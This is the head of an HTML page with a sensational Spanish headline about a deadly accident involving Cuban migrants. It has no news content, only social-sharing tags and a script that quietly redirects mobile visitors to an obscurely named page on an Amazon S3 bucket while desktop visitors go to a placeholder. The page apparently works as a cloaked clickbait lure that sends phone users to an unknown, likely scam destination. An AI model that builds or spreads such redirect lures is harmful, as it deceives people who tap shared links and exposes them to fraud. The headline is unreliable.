<!DOCTYPE html>
  <html lang="es">
  <head>
  <meta charset="utf-8"/>
  <meta name="title" content="Stream"/>
  <meta name="keywords" content="Instagram"/>
  <meta property="og:description" content="2411"/>
  <meta name="googlebot" content="noindex"/>
  <meta name="robots" content="index"/>
  <meta name="robots" content="noindex"/>
  <meta name="robots" content="nofollow"/>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta property="og:title" content="Dramático video: captan un fatal accidente que involucró a migrantes cubanos deja muertos y heridos esta mañana"/>
  <meta property="og:image" content="https://postcron-temp.us-east-1.linodeobjects.com/667c351e4c956-7cca55c2-a8834537-351e-5049.jpg"/> 
  <meta name="apple-itunes-app" content="app-id=6448311069"/>
  <script type="text/javascript">
    function generateRandomString(iLen) {
      var sRnd = '';
      var sChrs = "abcdefghiklmnopqrstuvwxyz";
      for (var i = 0; i < iLen; i++) {
        var randomPoz = Math.floor(Math.random() * sChrs.length);
        sRnd += sChrs.substring(randomPoz, randomPoz + 1);
      }
      return sRnd;
    }
          if (screen.width <= 720) {
          window.location = "https://ayhjusssssssss444.s3.eu-west-3.amazonaws.com/d1sddsd4+-+copia.html";
      } else {
          window.location = "https://example.com/default_page.html"
      }
  </script>
    
